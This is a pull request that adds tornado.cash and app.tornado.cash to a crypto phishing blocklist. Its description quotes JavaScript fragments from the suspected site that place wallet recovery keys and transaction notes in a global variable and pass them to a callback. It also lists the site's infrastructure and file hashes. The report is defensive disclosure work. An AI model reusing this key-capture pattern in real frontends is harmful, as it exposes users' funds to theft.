### PR TITLE
Add tornado.cash and app.tornado.cash

### DIFF
--- a/additions/permanent/domains.list
+++ b/additions/permanent/domains.list
@@ -149,6 +149,7 @@ app.solayer.bond
 app.sunwsap.net
 app.thorrswap.finance
 app.thorswap-v2.xyz
+app.tornado.cash
 app.uniswaq.org
 app.v2lido.bond
 app.zeiron.run
@@ -2480,6 +2481,7 @@ ton-telegram.network
 tonkeeper.bz
 tonkeeper.ee
 tonwallet.at
+tornado.cash
 toromadon.weebly.com
 trackingaen.life
 trackingaf.shop


### PR DESCRIPTION
## Phishing Domain/URL/IP(s):
<!-- Required. Use Back ticks. -->
```
https://tornado.cash
https://app.tornado.cash
```


## Impersonated domain
<!-- Required. Use Back ticks. -->
```
https://tornadocash.eth.limo
```

## Describe the issue
 Tornado Cash was removed from the U.S. Treasury / OFAC sanctions list on 2025-03-21 according to public reporting.

Public RDAP records show tornado.cash was registered shortly afterward on 2025-03-25 by a privacy-protected registrant, with Whois Privacy Corp. listed in the public registrant fields.

The public registration data does not attribute control of this domain to the original Tornado Cash development team.

The domain is currently serving a Tornado Cash-like website/application.

Suspicious crypto credential exposure risk observed on:


https://app.tornado.cash/

Static review of the deployed frontend on 2026-06-19 found suspicious JavaScript behavior in:

https://app.tornado.cash/_nuxt/36abd0b.js

The bundle assigns sensitive Tornado Cash note-account recovery key values and transaction note values into a global browser variable, window.nu, and conditionally invokes a global callback, window.q / q(window.nu), if present.

Observed suspicious patterns:

Recovery key path:
window.nu = i;
var n = window.q;
window.q = function(e) { return "function" == typeof n ? n(e) : e };
"function" == typeof window.q && window.q(window.nu)

New note-account recovery key path:
this.recoveryKey = this.$provider.web3.eth.accounts.create().privateKey.slice(2)
window.nu = this.recoveryKey

Transaction note path:
e?.note && (window.nu = ${e.prefix}-${e.note}, "function" == typeof window.q && window.q(window.nu))

Additional concern:
The captured page uses a permissive CSP:

connect-src *
script-src 'self' 'unsafe-inline' 'unsafe-eval'
Observed infrastructure on 2026-06-20:

Domain: tornado.cash
Subdomain: app.tornado.cash
A record: 101.99.75.124
Registrar: TLD Registrar Solutions Ltd. / IANA 1564
Nameservers: ns1.he.net, ns2.he.net, ns3.he.net, ns4.he.net, ns5.he.net
Hosting/network provider: Shinjiru Technology Sdn Bhd / SHINJIRU-MY
Observed SHA256 hashes:

app.tornado.cash /_nuxt/36abd0b.js
C7AD3CB3343F6F4E92F21421512F6C28E4064B86E72E7D4F82CE4CF2849E8B62

app.tornado.cash /_nuxt/7feff3e.js
2B24C94FA8F50018280F57AE3D9DBC3857CB39AFFCCFCD1FD68FCF3CE89D4134

app.tornado.cash /_nuxt/efccb72.js
D51D4324B6A58AC07024C40830E08F6DAB6C16E02E7899D333D85702CCA42D71

Comparison note:
A same-day comparison copy from tornadocash.eth.limo did not contain window.nu or window.q markers in its corresponding 36abd0b.js. 

## Related external source
MetaMask has blocked this domain.
```
https://github.com/MetaMask/eth-phishing-detect/pull/174144

```

### Screenshot

<img width="1025" height="523" alt="image" src="https://github.com/user-attachments/assets/3f6f7169-868f-4aab-82ee-704ea14be3ef" />
